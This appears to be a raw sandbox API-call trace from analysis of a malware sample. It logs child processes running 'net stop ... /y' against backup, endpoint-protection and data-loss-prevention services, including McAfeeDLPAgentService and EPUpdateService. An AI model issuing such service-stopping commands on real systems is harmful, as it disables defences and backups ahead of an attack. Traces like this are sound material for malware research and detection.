Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x12 [0100.514] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0100.514] LocalFree (hMem=0x58b510) returned 0x0 [0100.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0xf [0100.515] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0100.515] LocalFree (hMem=0x58b510) returned 0x0 [0100.515] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x17 [0100.515] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0100.515] LocalFree (hMem=0x58b510) returned 0x0 [0100.515] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x18 [0100.515] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0100.515] LocalFree (hMem=0x58b510) returned 0x0 [0100.515] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x2a [0100.515] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0100.515] LocalFree (hMem=0x58b510) returned 0x0 [0100.515] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x15 [0100.515] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0100.515] GetFileType (hFile=0x0) returned 0x0 [0100.515] GetConsoleOutputCP () returned 0x1b5 [0100.515] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0100.515] malloc (_Size=0x16) returned 0x5126d8 [0100.515] GetConsoleOutputCP () returned 0x1b5 [0100.515] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x5126d8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0100.515] WriteFile (in: hFile=0x0, lpBuffer=0x5126d8, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x14f8b4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14f8b4, lpOverlapped=0x0) returned 0 [0100.515] free (_Block=0x5126d8) [0100.515] LocalFree (hMem=0x58b510) returned 0x0 [0100.516] NetApiBufferFree (Buffer=0x581b10) returned 0x0 [0100.516] NetApiBufferFree (Buffer=0x581b28) returned 0x0 [0100.516] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop NetBackup BMR MTFTP Service /y" [0100.516] exit (_Code=1) Process: id = "88" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x26a6b000" os_pid = "0xf48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop EPUpdateService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 456 os_tid = 0xf4c Process: id = "89" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x21a02000" os_pid = "0xf6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "27" os_parent_pid = "0x4e4" cmd_line = "C:\\Windows\\system32\\net1 stop avpsus /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 467 os_tid = 0xf70 [0103.623] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af8ec | out: lpSystemTimeAsFileTime=0x1af8ec*(dwLowDateTime=0x1319def0, dwHighDateTime=0x1d6f0d1)) [0103.623] GetCurrentProcessId () returned 0xf6c [0103.623] GetCurrentThreadId () returned 0xf70 [0103.623] GetTickCount () returned 0x114deea [0103.623] QueryPerformanceCounter (in: lpPerformanceCount=0x1af8e4 | out: lpPerformanceCount=0x1af8e4*=22272365271) returned 1 [0103.623] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0103.623] __set_app_type (_Type=0x1) [0103.623] __p__fmode () returned 0x770331f4 [0103.623] __p__commode () returned 0x770331fc [0103.623] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0103.624] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0103.624] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0103.624] GetConsoleOutputCP () returned 0x1b5 [0103.624] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0103.624] SetThreadUILanguage (LangId=0x0) returned 0x409 [0103.627] sprintf_s (in: _DstBuf=0x1af8a4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0103.628] setlocale (category=0, locale=".437") returned="English_United States.437" [0103.630] GetStdHandle (nStdHandle=0xfffffff5) returned 0x30c [0103.630] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0103.630] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop avpsus /y" [0103.630] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1af670, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0103.630] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x60) returned 0x483ac8 [0103.630] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0103.631] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1af874 | out: Buffer=0x1af874*=0x481ad0) returned 0x0 [0103.631] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1af874 | out: Buffer=0x1af874*=0x481ae8) returned 0x0 [0103.631] _fileno (_File=0x77032900) returned -2 [0103.631] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0103.631] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0103.631] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0103.631] _wcsicmp (_String1="config", _String2="stop") returned -16 [0103.631] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0103.631] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0103.631] _wcsicmp (_String1="file", _String2="stop") returned -13 [0103.631] _wcsicmp (_String1="files", _String2="stop") returned -13 [0103.631] _wcsicmp (_String1="group", _String2="stop") returned -12 [0103.631] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0103.631] _wcsicmp (_String1="help", _String2="stop") returned -11 [0103.631] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0103.631] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0103.631] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0103.631] _wcsicmp (_String1="session", _String2="stop") returned -15 [0103.631] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0103.631] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0103.631] _wcsicmp (_String1="share", _String2="stop") returned -12 [0103.631] _wcsicmp (_String1="start", _String2="stop") returned -14 [0103.631] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0103.631] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0103.631] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0103.631] _wcsicmp (_String1="accounts", _String2="avpsus") returned -19 [0103.632] _wcsicmp (_String1="computer", _String2="avpsus") returned 2 [0103.632] _wcsicmp (_String1="config", _String2="avpsus") returned 2 [0103.632] _wcsicmp (_String1="continue", _String2="avpsus") returned 2 [0103.632] _wcsicmp (_String1="cont", _String2="avpsus") returned 2 [0103.632] _wcsicmp (_String1="file", _String2="avpsus") returned 5 [0103.632] _wcsicmp (_String1="files", _String2="avpsus") returned 5 [0103.632] _wcsicmp (_String1="group", _String2="avpsus") returned 6 [0103.632] _wcsicmp (_String1="groups", _String2="avpsus") returned 6 [0103.632] _wcsicmp (_String1="help", _String2="avpsus") returned 7 [0103.632] _wcsicmp (_String1="helpmsg", _String2="avpsus") returned 7 [0103.632] _wcsicmp (_String1="localgroup", _String2="avpsus") returned 11 [0103.632] _wcsicmp (_String1="pause", _String2="avpsus") returned 15 [0103.632] _wcsicmp (_String1="session", _String2="avpsus") returned 18 [0103.632] _wcsicmp (_String1="sessions", _String2="avpsus") returned 18 [0103.632] _wcsicmp (_String1="sess", _String2="avpsus") returned 18 [0103.632] _wcsicmp (_String1="share", _String2="avpsus") returned 18 [0103.632] _wcsicmp (_String1="start", _String2="avpsus") returned 18 [0103.632] _wcsicmp (_String1="stats", _String2="avpsus") returned 18 [0103.632] _wcsicmp (_String1="statistics", _String2="avpsus") returned 18 [0103.632] _wcsicmp (_String1="stop", _String2="avpsus") returned 18 [0103.632] _wcsicmp (_String1="time", _String2="avpsus") returned 19 [0103.632] _wcsicmp (_String1="user", _String2="avpsus") returned 20 [0103.632] _wcsicmp (_String1="users", _String2="avpsus") returned 20 [0103.632] _wcsicmp (_String1="msg", _String2="avpsus") returned 12 [0103.632] _wcsicmp (_String1="messenger", _String2="avpsus") returned 12 [0103.632] _wcsicmp (_String1="receiver", _String2="avpsus") returned 17 [0103.633] _wcsicmp (_String1="rcv", _String2="avpsus") returned 17 [0103.633] _wcsicmp (_String1="netpopup", _String2="avpsus") returned 13 [0103.633] _wcsicmp (_String1="redirector", _String2="avpsus") returned 17 [0103.633] _wcsicmp (_String1="redir", _String2="avpsus") returned 17 [0103.633] _wcsicmp (_String1="rdr", _String2="avpsus") returned 17 [0103.633] _wcsicmp (_String1="workstation", _String2="avpsus") returned 22 [0103.633] _wcsicmp (_String1="work", _String2="avpsus") returned 22 [0103.633] _wcsicmp (_String1="wksta", _String2="avpsus") returned 22 [0103.633] _wcsicmp (_String1="prdr", _String2="avpsus") returned 15 [0103.633] _wcsicmp (_String1="devrdr", _String2="avpsus") returned 3 [0103.633] _wcsicmp (_String1="lanmanworkstation", _String2="avpsus") returned 11 [0103.633] _wcsicmp (_String1="server", _String2="avpsus") returned 18 [0103.633] _wcsicmp (_String1="svr", _String2="avpsus") returned 18 [0103.633] _wcsicmp (_String1="srv", _String2="avpsus") returned 18 [0103.633] _wcsicmp (_String1="lanmanserver", _String2="avpsus") returned 11 [0103.633] _wcsicmp (_String1="alerter", _String2="avpsus") returned -10 [0103.633] _wcsicmp (_String1="netlogon", _String2="avpsus") returned 13 [0103.633] _wcsupr (in: _String="avpsus" | out: _String="AVPSUS") returned="AVPSUS" [0103.634] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x485488 [0104.190] GetServiceKeyNameW (in: hSCManager=0x485488, lpDisplayName="AVPSUS", lpServiceName=0x3faaf0, lpcchBuffer=0x1af810 | out: lpServiceName="", lpcchBuffer=0x1af810) returned 0 [0104.190] _wcsicmp (_String1="msg", _String2="AVPSUS") returned 12 [0104.190] _wcsicmp (_String1="messenger", _String2="AVPSUS") returned 12 [0104.190] _wcsicmp (_String1="receiver", _String2="AVPSUS") returned 17 [0104.190] _wcsicmp (_String1="rcv", _String2="AVPSUS") returned 17 [0104.190] _wcsicmp (_String1="redirector", _String2="AVPSUS") returned 17 [0104.190] _wcsicmp (_String1="redir", _String2="AVPSUS") returned 17 [0104.190] _wcsicmp (_String1="rdr", _String2="AVPSUS") returned 17 [0104.190] _wcsicmp (_String1="workstation", _String2="AVPSUS") returned 22 [0104.190] _wcsicmp (_String1="work", _String2="AVPSUS") returned 22 [0104.191] _wcsicmp (_String1="wksta", _String2="AVPSUS") returned 22 [0104.191] _wcsicmp (_String1="prdr", _String2="AVPSUS") returned 15 [0104.191] _wcsicmp (_String1="devrdr", _String2="AVPSUS") returned 3 [0104.191] _wcsicmp (_String1="lanmanworkstation", _String2="AVPSUS") returned 11 [0104.191] _wcsicmp (_String1="server", _String2="AVPSUS") returned 18 [0104.191] _wcsicmp (_String1="svr", _String2="AVPSUS") returned 18 [0104.191] _wcsicmp (_String1="srv", _String2="AVPSUS") returned 18 [0104.191] _wcsicmp (_String1="lanmanserver", _String2="AVPSUS") returned 11 [0104.191] _wcsicmp (_String1="alerter", _String2="AVPSUS") returned -10 [0104.191] _wcsicmp (_String1="netlogon", _String2="AVPSUS") returned 13 [0104.191] NetServiceControl (in: servername=0x0, service="AVPSUS", opcode=0x0, arg=0x0, bufptr=0x1af80c | out: bufptr=0x1af80c) returned 0x889 [0104.193] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0104.193] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0104.194] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0104.195] GetFileType (hFile=0x0) returned 0x0 [0104.195] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x483ea8 [0104.195] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x483ea8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0104.195] WriteFile (in: hFile=0x0, lpBuffer=0x483ea8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1af74c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1af74c, lpOverlapped=0x0) returned 0 [0104.195] LocalFree (hMem=0x483ea8) returned 0x0 [0104.195] GetFileType (hFile=0x0) returned 0x0 [0104.195] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x486150 [0104.195] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x486150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nH", lpUsedDefaultChar=0x0) returned 2 [0104.195] WriteFile (in: hFile=0x0, lpBuffer=0x486150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1af74c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1af74c, lpOverlapped=0x0) returned 0 [0104.195] LocalFree (hMem=0x486150) returned 0x0 [0104.196] _ultow (in: _Dest=0x889, _Radix=1767292 | out: _Dest=0x889) returned="2185" [0104.196] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0104.196] GetFileType (hFile=0x0) returned 0x0 [0104.196] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x486150 [0104.196] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x486150, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0104.196] WriteFile (in: hFile=0x0, lpBuffer=0x486150, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1af758, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1af758, lpOverlapped=0x0) returned 0 [0104.196] LocalFree (hMem=0x486150) returned 0x0 [0104.196] GetFileType (hFile=0x0) returned 0x0 [0104.196] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x486150 [0104.196] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x486150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nH", lpUsedDefaultChar=0x0) returned 2 [0104.196] WriteFile (in: hFile=0x0, lpBuffer=0x486150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1af758, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1af758, lpOverlapped=0x0) returned 0 [0104.196] LocalFree (hMem=0x486150) returned 0x0 [0104.197] NetApiBufferFree (Buffer=0x481ad0) returned 0x0 [0104.197] NetApiBufferFree (Buffer=0x481ae8) returned 0x0 [0104.197] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop avpsus /y" [0104.197] exit (_Code=2) Process: id = "90" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x20053000" os_pid = "0xf74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "28" os_parent_pid = "0x9f4" cmd_line = "C:\\Windows\\system32\\net1 stop McAfeeDLPAgentService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 468 os_tid = 0xf78 [0103.659] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x29fd4c | out: lpSystemTimeAsFileTime=0x29fd4c*(dwLowDateTime=0x13210310, dwHighDateTime=0x1d6f0d1)) [0103.659] GetCurrentProcessId () returned 0xf74 [0103.659] GetCurrentThreadId () returned 0xf78 [0103.659] GetTickCount () returned 0x114df19 [0103.659] QueryPerformanceCounter (in: lpPerformanceCount=0x29fd44 | out: lpPerformanceCount=0x29fd44*=22275991934) returned 1 [0103.659] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0103.659] __set_app_type (_Type=0x1) [0103.659] __p__fmode () returned 0x770331f4 [0103.660] __p__commode () returned 0x770331fc [0103.660] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0103.660] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0103.660] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0103.660] GetConsoleOutputCP () returned 0x1b5 [0103.660] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0103.660] SetThreadUILanguage (LangId=0x0) returned 0x409 [0103.664] sprintf_s (in: _DstBuf=0x29fd04, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0103.664] setlocale (category=0, locale=".437") returned="English_United States.437" [0103.667] GetStdHandle (nStdHandle=0xfffffff5) returned 0x30c [0103.667] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0103.667] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McAfeeDLPAgentService /y" [0103.667] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x29fad0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0103.667] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x7e) returned 0x6e3af8 [0103.667] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0103.667] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x29fcd4 | out: Buffer=0x29fcd4*=0x6e1b00) returned 0x0 [0103.667] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x29fcd4 | out: Buffer=0x29fcd4*=0x6e1b18) returned 0x0 [0103.668] _fileno (_File=0x77032900) returned -2 [0103.668] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0103.668] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0103.668] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0103.668] _wcsicmp (_String1="config", _String2="stop") returned -16 [0103.668] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0103.668] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0103.668] _wcsicmp (_String1="file", _String2="stop") returned -13 [0103.668] _wcsicmp (_String1="files", _String2="stop") returned -13 [0103.668] _wcsicmp (_String1="group", _String2="stop") returned -12 [0103.668] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0103.668] _wcsicmp (_String1="help", _String2="stop") returned -11 [0103.668] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0103.668] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0103.668] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0103.668] _wcsicmp (_String1="session", _String2="stop") returned -15 [0103.668] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0103.668] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0103.668] _wcsicmp (_String1="share", _String2="stop") returned -12 [0103.668] _wcsicmp (_String1="start", _String2="stop") returned -14 [0103.668] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0103.668] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0103.668] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0103.668] _wcsicmp (_String1="accounts", _String2="McAfeeDLPAgentService") returned -12 [0103.668] _wcsicmp (_String1="computer", _String2="McAfeeDLPAgentService") returned -10 [0103.669] _wcsicmp (_String1="config", _String2="McAfeeDLPAgentService") returned -10 [0103.669] _wcsicmp (_String1="continue", _String2="McAfeeDLPAgentService") returned -10 [0103.669] _wcsicmp (_String1="cont", _String2="McAfeeDLPAgentService") returned -10 [0103.669] _wcsicmp (_String1="file", _String2="McAfeeDLPAgentService") returned -7 [0103.669] _wcsicmp (_String1="files", _String2="McAfeeDLPAgentService") returned -7 [0103.669] _wcsicmp (_String1="group", _String2="McAfeeDLPAgentService") returned -6 [0103.669] _wcsicmp (_String1="groups", _String2="McAfeeDLPAgentService") returned -6 [0103.669] _wcsicmp (_String1="help", _String2="McAfeeDLPAgentService") returned -5 [0103.669] _wcsicmp (_String1="helpmsg", _String2="McAfeeDLPAgentService") returned -5 [0103.669] _wcsicmp (_String1="localgroup", _String2="McAfeeDLPAgentService") returned -1 [0103.669] _wcsicmp (_String1="pause", _String2="McAfeeDLPAgentService") returned 3 [0103.669] _wcsicmp (_String1="session", _String2="McAfeeDLPAgentService") returned 6 [0103.669] _wcsicmp (_String1="sessions", _String2="McAfeeDLPAgentService") returned 6 [0103.669] _wcsicmp (_String1="sess", _String2="McAfeeDLPAgentService") returned 6 [0103.669] _wcsicmp (_String1="share", _String2="McAfeeDLPAgentService") returned 6 [0103.669] _wcsicmp (_String1="start", _String2="McAfeeDLPAgentService") returned 6 [0103.669] _wcsicmp (_String1="stats", _String2="McAfeeDLPAgentService") returned 6 [0103.669] _wcsicmp (_String1="statistics", _String2="McAfeeDLPAgentService") returned 6 [0103.669] _wcsicmp (_String1="stop", _String2="McAfeeDLPAgentService") returned 6 [0103.669] _wcsicmp (_String1="time", _String2="McAfeeDLPAgentService") returned 7 [0103.669] _wcsicmp (_String1="user", _String2="McAfeeDLPAgentService") returned 8 [0103.669] _wcsicmp (_String1="users", _String2="McAfeeDLPAgentService") returned 8 [0103.669] _wcsicmp (_String1="msg", _String2="McAfeeDLPAgentService") returned 16 [0103.669] _wcsicmp (_String1="messenger", _String2="McAfeeDLPAgentService") returned 2 [0103.669] _wcsicmp (_String1="receiver", _String2="McAfeeDLPAgentService") returned 5 [0103.669] _wcsicmp (_String1="rcv", _String2="McAfeeDLPAgentService") returned 5 [0103.670] _wcsicmp (_String1="netpopup", _String2="McAfeeDLPAgentService") returned 1 [0103.670] _wcsicmp (_String1="redirector", _String2="McAfeeDLPAgentService") returned 5 [0103.670] _wcsicmp (_String1="redir", _String2="McAfeeDLPAgentService") returned 5 [0103.670] _wcsicmp (_String1="rdr", _String2="McAfeeDLPAgentService") returned 5 [0103.670] _wcsicmp (_String1="workstation", _String2="McAfeeDLPAgentService") returned 10 [0103.670] _wcsicmp (_String1="work", _String2="McAfeeDLPAgentService") returned 10 [0103.670] _wcsicmp (_String1="wksta", _String2="McAfeeDLPAgentService") returned 10 [0103.670] _wcsicmp (_String1="prdr", _String2="McAfeeDLPAgentService") returned 3 [0103.670] _wcsicmp (_String1="devrdr", _String2="McAfeeDLPAgentService") returned -9 [0103.670] _wcsicmp (_String1="lanmanworkstation", _String2="McAfeeDLPAgentService") returned -1 [0103.670] _wcsicmp (_String1="server", _String2="McAfeeDLPAgentService") returned 6 [0103.670] _wcsicmp (_String1="svr", _String2="McAfeeDLPAgentService") returned 6 [0103.670] _wcsicmp (_String1="srv", _String2="McAfeeDLPAgentService") returned 6 [0103.670] _wcsicmp (_String1="lanmanserver", _String2="McAfeeDLPAgentService") returned -1 [0103.670] _wcsicmp (_String1="alerter", _String2="McAfeeDLPAgentService") returned -12 [0103.670] _wcsicmp (_String1="netlogon", _String2="McAfeeDLPAgentService") returned 1 [0103.670] _wcsupr (in: _String="McAfeeDLPAgentService" | out: _String="MCAFEEDLPAGENTSERVICE") returned="MCAFEEDLPAGENTSERVICE" [0103.671] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6e54d8 [0104.204] GetServiceKeyNameW (in: hSCManager=0x6e54d8, lpDisplayName="MCAFEEDLPAGENTSERVICE", lpServiceName=0x3faaf0, lpcchBuffer=0x29fc70 | out: lpServiceName="", lpcchBuffer=0x29fc70) returned 0 [0104.205] _wcsicmp (_String1="msg", _String2="MCAFEEDLPAGENTSERVICE") returned 16 [0104.205] _wcsicmp (_String1="messenger", _String2="MCAFEEDLPAGENTSERVICE") returned 2 [0104.205] _wcsicmp (_String1="receiver", _String2="MCAFEEDLPAGENTSERVICE") returned 5 [0104.205] _wcsicmp (_String1="rcv", _String2="MCAFEEDLPAGENTSERVICE") returned 5 [0104.205] _wcsicmp (_String1="redirector", _String2="MCAFEEDLPAGENTSERVICE") returned 5 [0104.205] _wcsicmp (_String1="redir", _String2="MCAFEEDLPAGENTSERVICE") returned 5 [0104.205] _wcsicmp (_String1="rdr", _String2="MCAFEEDLPAGENTSERVICE") returned 5 [0104.205] _wcsicmp (_String1="workstation", _String2="MCAFEEDLPAGENTSERVICE") returned 10 [0104.205] _wcsicmp (_String1="work", _String2="MCAFEEDLPAGENTSERVICE") returned 10 [0104.205] _wcsicmp (_String1="wksta", _String2="MCAFEEDLPAGENTSERVICE") returned 10 [0104.205] _wcsicmp (_String1="prdr", _String2="MCAFEEDLPAGENTSERVICE") returned 3 [0104.205] _wcsicmp 